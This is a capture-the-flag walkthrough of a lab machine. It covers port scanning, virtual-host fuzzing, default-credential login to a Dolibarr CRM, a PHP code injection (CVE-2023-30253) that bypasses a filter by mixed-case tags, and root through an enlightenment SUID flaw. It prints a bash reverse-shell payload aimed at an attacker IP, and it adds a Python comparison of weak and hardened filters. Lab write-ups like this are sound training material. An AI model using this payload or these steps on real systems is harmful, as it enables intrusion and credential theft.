- I start with a scan of the open ports:
nmap -p- --open --min-rate 5000 -Pn -sS 10.10.11.11 -oG scan

- I scan the open ports with default scripts and version detection:
nmap -p22,80 -sCV 10.10.11.11 -oN ports

- I look at what technologies the website is using. During this reconnaissance I found a hostname and added it to the /etc/hosts file:
whatweb http://10.10.11.11


- After searching for a while through the site and the routes discovered with gobuster I can't find anything relevant. When fuzzing for virtual hosts I find one, crm:
wfuzz -c -t 200 --hh=15949 -w /usr/share/amass/wordlist/subdomains-top1mil-110000.txt -H "Host: FUZZ.board.htb" http://board.htb

- I add it to the /etc/hosts file and enter the site.

- I try the default credentials admin:admin and get access.

- When looking for vulnerabilities in this version I find CVE-2023-30253, which consists of creating a website and a page to which we can add PHP code. The page content is validated so that the string "php" is rejected, but writing it as shown below gets past the check.
Security Advisory: Dolibarr 17.0.0 PHP Code Injection (CVE-2023-30253) - Swascan
- We add a piece of code to create a reverse shell and then open the page we have just created so that our code executes:
<?pHp
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.205/4242 0>&1'");
?>
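The bypass above works because the check is a case-sensitive substring match while PHP's lexer accepts the open tag in any case. The following is an added example (not Dolibarr's code) that models the weak check beside a corrected one and runs both over constructed page bodies:

```python
import re

# Constructed sample page bodies. "mixed_case" mirrors the variant used in
# the walkthrough; the others cover forms the weak check also misses.
SAMPLES = {
    "plain": "<?php echo 1; ?>",
    "mixed_case": "<?pHp exec('id'); ?>",
    "upper": "<?PHP system('id'); ?>",
    "short_echo": "<?= shell_exec('id') ?>",
    "benign": "<p>Hello, <b>world</b></p>",
}


def weak_filter(content: str) -> bool:
    """Model of a case-sensitive blacklist: True means the content is accepted.

    PHP's lexer treats '<?php' case-insensitively, so '<?pHp' and '<?PHP'
    are executed by the interpreter but pass this check untouched.
    """
    return "php" not in content


def hardened_filter(content: str) -> bool:
    """Reject any PHP open tag regardless of case: True means accepted.

    A bare '<?' is also rejected because the short open tag ('<?' and '<?=')
    can be enabled in php.ini, so filtering only 'php' is insufficient.
    Stored pages should still never be written where the interpreter
    executes them; this filter is defence in depth, not the primary fix.
    """
    return re.search(r"<\?", content, flags=re.IGNORECASE) is None


def compare(samples=SAMPLES):
    """Return {name: (weak_accepts, hardened_accepts)} for each sample."""
    return {name: (weak_filter(c), hardened_filter(c)) for name, c in samples.items()}


if __name__ == "__main__":
    for name, (weak, hard) in compare().items():
        print(f"{name:11s} weak={'accept' if weak else 'reject':6s} hardened={'accept' if hard else 'reject'}")
```

Only the benign sample is accepted by both checks; every tag variant other than lowercase `<?php` slips past the weak filter and is caught by the hardened one.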

- I start listening on port 4242 and get a shell.

- I search for the Dolibarr configuration file and find some MySQL credentials.

- I try to reuse the password found with the user larissa, whom I find by looking at the /etc/passwd file.

- Searching for SUID binaries I find some unusual files, and running linpeas confirms my suspicions. The enlightenment binaries in versions prior to 0.25.4 have a vulnerability listed as CVE-2022-37706.
find / -perm -4000 2>/dev/null


- I find a PoC for this CVE and by running it I manage to escalate my privileges and become root:
CVE-2022-37706-LPE-exploit
